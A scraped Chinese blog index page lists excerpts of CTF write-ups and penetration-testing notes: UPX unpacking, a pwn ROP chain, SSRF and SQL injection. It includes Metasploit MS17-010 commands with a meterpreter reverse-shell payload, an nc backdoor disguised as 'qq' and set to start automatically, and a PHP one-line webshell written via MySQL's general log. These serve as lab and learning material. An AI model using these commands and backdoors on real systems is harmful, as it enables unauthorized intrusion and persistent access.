自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 BUUCTF Youngter-drive

首先查壳发现是upx壳,直接上工具脱壳upx -d E:\桌面\7289daa8-a5d5-430e-87a0-92ce805d8f15\Youngter-drive.exe打开是这样的程序拉入IDA进行分析找到主函数,发现创建了两个线程,一个StartAddress,一个sub_41119F,进去看看这里是对我们的flag进行操作,主要函数是sub_41112C会出现这种情况,原因是堆栈不平衡利用ida调堆栈就好找到411A04处,在pop ebp上按alt+k将0x4改为.

2021-06-21 16:55:31 353

原创 BUUCTF not_the_same_3dsctf_2016

checksec 检查开启了什么保护开启了nx保护本地执行一下并没有看出啥拉入32位ida主函数代码,接着找找字符串发现flag.txt,找到调用它的函数我是个pwn小白,一开始以为直接在main的get函数里溢出覆盖返回地址到这个函数就可以了,构造payload后发现程序卡住了然后看其他大佬的解题思路,发现从mprotect这个函数入手32位程序参数从栈上传,但我们要保证栈平衡来让程序继续正常运行,所以我们要找三个pop,把我们构造的参数弹出去利用工具找到我们需要的pop地址R

2021-06-14 18:33:51 162

原创 nc后门

实验环境靶 机:windows 7攻击机:kali漏洞利用:ms17-010msfconsoleuse exploit/windows/smb/ms17_010_eternalbuleset payload windows/x64/meterpreter/reverse_tcpset rhosts 192.168.21.134set lhost 192.168.21.130set lport 6666run拿到权限后上传我们的nc后门程序(我把它改名成了qq)查看启动项的键值项,

2021-03-21 22:53:11 1268

原创 通过MySql写入一句话进行提权

本次实战直接以phpMyAdmin里进行sql语句操作1.show variables like “general_log%”将general_log改成ON就可以进行mysql日志输出保存了将general_log_file改成能执行php的目录下,即网站目录下查看我们修改后的配置写入我们的一句话木马select "<?php @eval($_REQUEST['cmd']);?>在这里我们可以看到成功写入了用蚁剑连接接下来我们用msf进行提权,打开kali,这里

2021-03-19 21:26:41 323

原创 攻防世界 favorite_number

打开后发现是一道php代码审计题1.首先是个判断,既要数组强等,又要首元素不为admin2.做了一个正则匹配,要求字符串全为数字,大小写不敏感,跨行检测3.写了一个黑名单,把常用的都排除了数组判断这个第一个绕过就让人头疼想了想他这提示了php5.5.9,那应该是从php5.5.9这个版本的本身漏洞着手查了查有数组溢出漏洞参考:PHP的信息安全(入侵获取$flag)的题目【Q2】PHP数组的key溢出问题看了其他大佬的wp,发现这个php5.5.9版本的数组溢出值为4294967296.

2021-02-22 11:58:36 263

原创 BUUCTF [安洵杯 2019]easy_web

进入到靶机中,在url里我们看见了两个参数一个是img,一个是cmd,显然cmd是给我们的一个后门函数,但是肯定没有这么简单,img则对应左上角的这张图片,让我们看一下源代码这里面是图片base64编码的结果,然后我们把img参数里的base64进行解码,首先base64解码两次,再将得到的16进制转成字符串这里得到555.png应该是左上角图片的名字,然后我们需要得到index.php的源码,看看它在干嘛,同样我们将index.php转成16进制,再进行base64编码2次,得到以下代码&lt.

2021-02-11 19:08:03 685

原创 python逆向入门

python逆向基础一..python的运行机制(1)、把原始代码编译成字节码编译后的字节码是特定于Python的一种表现形式,它不是二进制的机器码,需要进一步编译才能被机器执行,这也是Python代码无法运行的像C/C++ 一样快的原因。如果Python进程在机器上拥有写入权限,那么它将把程序的字节码保存为一个以.pyc 为扩展名的文件,如果Python无法在机器上写入字节码,那么字节码将会在内存中生成并在程序结束时自动丢弃。在构建程序的时候最好给Python赋上在计算机上写的权限,这样只要源代码

2021-02-02 17:08:44 3038

原创 BUUCTF Warmup Writeup

点击链接进来我们发现一个大大的邪恶的笑脸常规操作先查看源代码发现有一个提示,提示我们有一个source.php,应该是个源代码,我们进去看一下这是一段对我们传的file参数的过滤他首先建立一个白名单,白名单内包含了source.php和hint.php,第一个判断是如果我们传的file参数为空或者不是字符串就返回false第二个if判断所传的参数是否在白名单内,如果是则返回正确,不是则进行下一步判断然后利用mb_substr函数对我们的参数相对于?问号进行分割再判断参数是否在白名单..

2020-12-25 08:49:08 181

原创 攻防世界XCTF fakebook

打开后我们发现login 和 join ,我们先join其实,这里是有个post注入的查注入的方法首先我们打开bp抓包工具右键选择复制到文件我们发现这里的username可以进行post注入,后面就可以无脑注入了。第二种方法点击我们的admin下载源码查看Get()方法并没有对获取过来的url进行任何的过滤所以这里存在SSRF这里我们对no传参发现有注入漏洞从报错信息中我们可以得到网站的绝对路径,由于这里不存在回显,那我们便使用updatexml函数进行报错注入.

2020-12-09 20:10:17 224

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除